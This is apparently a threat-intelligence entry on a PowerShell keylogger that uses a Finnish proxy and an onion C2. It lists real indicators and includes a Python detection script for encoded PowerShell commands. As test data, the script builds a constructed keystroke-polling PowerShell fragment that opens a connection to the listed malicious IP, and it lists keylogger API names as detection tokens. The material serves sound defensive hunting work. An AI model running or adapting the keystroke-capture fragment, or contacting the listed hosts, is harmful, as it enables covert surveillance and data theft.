PowerShell Keylogger
Sept. 4, 2024, 9:45 a.m.
Tags
External References
Description
A newly identified keylogger implemented as a PowerShell script has been analyzed. It captures keystrokes, gathers system information, and exfiltrates the collected data. To hide the operator, the malware routes traffic through a cloud server in Finland acting as a proxy and uses an Onion (Tor hidden service) address for command-and-control (C2). Its functions include screen capture, execution of encoded commands, and repeated attempts to re-establish the C2 connection. The keylogger's code suggests a French-speaking developer. The approach is sophisticated, but the persistence mechanism is incomplete, which suggests the tool is still under development and may gain further capabilities. The analysis underlines the need for controls that catch this kind of stealthy, script-based threat, in particular logging and inspection of encoded PowerShell execution and of outbound connections initiated by PowerShell.
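The description above boils down to three things a hunter can look for: PowerShell launched with an encoded command (T1059.001), PowerShell talking to an unexpected host or port (T1571), and the indicators listed below. The following is an added example, not code from the original analysis or from the malware author. It walks a handful of constructed log records (fields modelled on Sysmon process-creation, network-connection and file-creation events), decodes any -EncodedCommand payload the way powershell.exe does (base64 of UTF-16LE text), and flags matches against this page's indicators plus generic keystroke-capture tells. Only the three indicator values are taken from the page; the log lines, the sample scripts, the API names in SUSPICIOUS_TOKENS and the port 8080 are constructed for illustration and are not claims about the real sample.

```python
"""Hunting sketch for the PowerShell keylogger described above.

Added example, not code from the original analysis. Only the three
indicator values come from the page; every record, script and port
below is constructed for illustration.
"""
import base64
import binascii
import re

# Indicators quoted from the page.
IOC_SHA256 = "181fe99c16fa6cc87a3161bc08a9e2dbd17531c7d713b09d8567c1b3debe121f"
IOC_IP = "37.143.129.165"
IOC_ONION = "opioem3zmp3bgx3qjqkh6vimkdoerrwh3uhawklm5ndv5e7k3t4edbqd.onion"

# Generic capture/exfil tells to look for in a decoded script. Assumption:
# the page does not quote the sample's code, so these are common keylogger
# APIs, not confirmed strings from this malware.
SUSPICIOUS_TOKENS = ("GetAsyncKeyState", "SetWindowsHookEx", "CopyFromScreen", "TcpClient")

# powershell.exe accepts -ec and any prefix of -EncodedCommand (-e, -enc, ...).
_ENC_ALTS = "|".join(["ec"] + ["encodedcommand"[:n] for n in range(1, 15)])
_ENC_RE = re.compile(r"(?:^|\s)-(?:" + _ENC_ALTS + r")\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(command_line):
    """Return the script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = _ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(records):
    """Return (record_id, tag, reason) findings; tag is an ATT&CK ID or 'ioc'."""
    findings = []
    for rec in records:
        rid, kind = rec["id"], rec["type"]
        if kind == "process":
            script = decode_encoded_command(rec.get("command_line", ""))
            if script is None:
                continue
            findings.append((rid, "T1059.001", "encoded PowerShell command decoded"))
            low = script.lower()
            for tok in SUSPICIOUS_TOKENS:
                if tok.lower() in low:
                    findings.append((rid, "T1059.001", "decoded script references " + tok))
            for ioc in (IOC_IP, IOC_ONION):
                if ioc in script:
                    findings.append((rid, "ioc", "decoded script contains " + ioc))
        elif kind == "network":
            dest = rec.get("dest_host") or rec.get("dest_ip", "")
            if dest in (IOC_IP, IOC_ONION):
                findings.append((rid, "ioc", "connection to listed indicator " + dest))
            # Heuristic for T1571: PowerShell talking on something other than 80/443.
            if rec["image"].lower().endswith("powershell.exe") and rec["dest_port"] not in (80, 443):
                findings.append((rid, "T1571", "powershell.exe connected on port %d" % rec["dest_port"]))
        elif kind == "file":
            if rec.get("sha256", "").lower() == IOC_SHA256:
                findings.append((rid, "ioc", "dropped file matches listed SHA-256"))
    return findings


def encode_command(script):
    """Encode a script exactly as powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: a keylogger-like loop pointing at the listed IP (port
# chosen for the example; the page does not state the real one), and a
# harmless admin one-liner that happens to be base64-encoded too.
_MAL_SCRIPT = (
    "$c = New-Object Net.Sockets.TcpClient('" + IOC_IP + "', 8080); "
    "while ($true) { for ($k = 8; $k -le 254; $k++) { "
    "if ([Win32]::GetAsyncKeyState($k) -band 0x8000) { $buf += [char]$k } } }"
)
_BENIGN_SCRIPT = "Get-Service | Where-Object Status -eq 'Running' | Out-File C:\\tmp\\svc.txt"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_RECORDS = [  # constructed, not real telemetry
    {"id": 1, "type": "process", "image": PS,
     "command_line": "powershell.exe -NoP -W Hidden -enc " + encode_command(_MAL_SCRIPT)},
    {"id": 2, "type": "process", "image": PS,
     "command_line": "powershell.exe -EncodedCommand " + encode_command(_BENIGN_SCRIPT)},
    {"id": 3, "type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c dir"},
    {"id": 4, "type": "network", "image": PS, "dest_ip": IOC_IP, "dest_port": 8080},
    {"id": 5, "type": "network", "image": r"C:\Program Files\Google\Chrome\chrome.exe",
     "dest_ip": "198.51.100.7", "dest_port": 443},
    {"id": 6, "type": "file", "path": r"C:\Users\Public\kl.ps1", "sha256": IOC_SHA256},
]

if __name__ == "__main__":
    for rid, tag, reason in analyze(SAMPLE_RECORDS):
        print("record %d [%s] %s" % (rid, tag, reason))
```

The benign encoded one-liner (record 2) is flagged only as "encoded command decoded", which is the point of decoding rather than alerting on the bare -enc switch: triage on what the script does and whom it talks to, not on the encoding itself. The non-standard-port check is a heuristic and will need tuning to the environment; the indicator matches are the high-confidence findings.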
Date
Published: Sept. 4, 2024, 9:05 a.m.
Created: Sept. 4, 2024, 9:05 a.m.
Modified: Sept. 4, 2024, 9:45 a.m.
Indicators
SHA-256 file hash: 181fe99c16fa6cc87a3161bc08a9e2dbd17531c7d713b09d8567c1b3debe121f
IPv4 address: 37.143.129.165
Onion (Tor hidden service) C2 address: opioem3zmp3bgx3qjqkh6vimkdoerrwh3uhawklm5ndv5e7k3t4edbqd.onion
Attack Patterns
T1059.001 Command and Scripting Interpreter: PowerShell
T1571 Non-Standard Port
T1082 System Information Discovery
T1083 File and Directory Discovery
T1059 Command and Scripting Interpreter (parent technique of T1059.001)
Additional Information
Finland (location of the cloud server used as proxy)